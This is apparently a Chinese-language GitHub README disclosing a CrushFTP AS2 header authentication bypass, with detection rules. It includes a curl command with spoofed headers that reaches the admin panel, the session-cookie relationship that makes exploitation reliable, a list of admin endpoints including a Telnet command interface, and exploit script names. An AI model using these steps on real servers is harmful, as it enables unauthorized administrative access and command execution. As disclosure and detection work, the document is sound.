CrushFTP AS2 认证绕过研究,允许未认证的管理员访问。包含 PoC 脚本、检测规则和技术分析,用于教育和防御目的。
⚠️ 重要提示: 该漏洞已于 2025 年 11 月被 CrushFTP 修复。此研究仅出于教育和防御目的发布。
📝 注意: 本研究基于与 CVE-2025-54309 相似的漏洞模式。确切的 CVE 编号可能不同。这是一项在受控家庭实验室环境中进行的独立安全研究。
本仓库记录了 CrushFTP 服务器中一个严重身份验证绕过漏洞,该漏洞通过 AS2(适用性声明 2)头部操作实现完全管理权限。该漏洞无需身份验证,且可通过单个 HTTP 请求利用。
关键点:
研究人员: SmileyFace101 (@SmileyFace101)
CrushFTP 的 Web 界面错误地信任 AS2 协议头部,未进行适当验证。服务器假定 AS2 请求已预认证,从而绕过正常认证流程。
易受攻击的 CrushFTP 版本(实验室确认):
已修复版本:
实验室环境:
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
示例(实验室环境):
curl -H "X-DMZ-Proxy: disabled" \
-H "X-AS2-Version: 1.0" \
-H "User-Agent: AS2Server/1.0" \
"http://10.0.100.50/WebInterface/admin/index.html"
注意: 仅对您拥有或获得明确许可的系统使用。
在利用过程中,我们发现了会话 Cookie 生成中的一个数学关系,使得利用具有 100% 可靠性:
CrushAuth 结构:[时间戳]_[会话 ID]
currentAuth = 会话 ID 的最后 4 个字符
c2f 参数 = 与 currentAuth 值相同
✅ 完全服务器和用户枚举
✅ 用户账户创建与修改
✅ 文件系统访问与浏览
✅ 通过 Telnet 接口执行命令
✅ 以系统权限调度任务
✅ 访问 PGP 密钥和证书
✅ 修改管理配置
请参阅 detection/ 目录:
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
/WebInterface/function/# Web 服务器日志
grep -E "(X-DMZ-Proxy|X-AS2-Version|AS2Server)" /var/log/nginx/access.log
# CrushFTP 应用日志
grep -E "(WebInterface/admin|WebInterface/function)" crushftp.log
.
├── README.md # 本文件——概述与用法
├── docs/
│ └── TECHNICAL_ANALYSIS.md # 完整技术深度分析
├── exploits/
│ ├── enhanced_session_exploit.sh # 完整利用,含会话管理
│ ├── targeted_exploitation.sh # 高价值端点测试
│ └── adaptive_exploitation.sh # 多策略方法
└── detection/
├── snort_rules.txt # IDS/IPS 签名(Snort)
├── suricata_rules.txt # IDS/IPS 签名(Suricata)
└── log_analysis.sh # 日志分析与 IOC 检测
阅读文档:
在您的实验室中测试:
# 确保您拥有目标系统的所有权!
./exploits/enhanced_session_exploit.sh 10.0.100.50
部署检测:
✅ 发现并记录了完整的 AS2 身份验证绕过
✅ 识别并解决了关键的会话 Cookie 生成要求
✅ 逆向工程了会话管理中的数学关系
✅ 开发了两阶段利用方法
✅ 建立了 100% 可靠的利用模式
✅ 识别并分析了多个 RCE 向量
✅ 执行了完整的 JavaScript 源代码分析
/WebInterface/admin/index.html — 主管理面板/WebInterface/admin/telnet.html — Telnet 接口/WebInterface/Jobs/index.html — 作业管理/WebInterface/UserManager/index.html — 用户管理/WebInterface/PGP/index.html — PGP 密钥管理/WebInterface/function/ — 管理功能处理器作者: SmileyFace101
GitHub: @SmileyFace101
研究期间: 2025 年 3 月至 7 月(家庭实验室)
公开披露: 2025 年 12 月 6 日
本研究仅用于教育和防御目的。
✅ 允许使用:
❌ 禁止:
使用本研究即表示您同意:
免责声明: 作者不对误用承担任何责任。未经授权的计算机访问是非法的。
MIT 许可证 — 详情请参阅 LICENSE 文件。
最后更新: 2025 年 12 月 6 日
风险评估: 严重 — 需要立即打补丁并采取缓解措施
最后更新: 2025 年 12 月 6 日
作者: SmileyFace101
研究进行时间: 2025 年 3 月至 7 月,在授权的实验室环境中
| 安全方面 | 影响级别 | 描述 |
|---|
| 机密性 | 🔴 严重 | 完全访问凭据、配置、PGP 密钥、日志 |
| 完整性 | 🔴 严重 | 创建用户账户、更改配置、修改文件 |
| 可用性 | 🟡 高 | 能够执行系统命令、中断服务 |
| 权限提升 | 🔴 严重 | 直接管理员访问、创建持久账户 |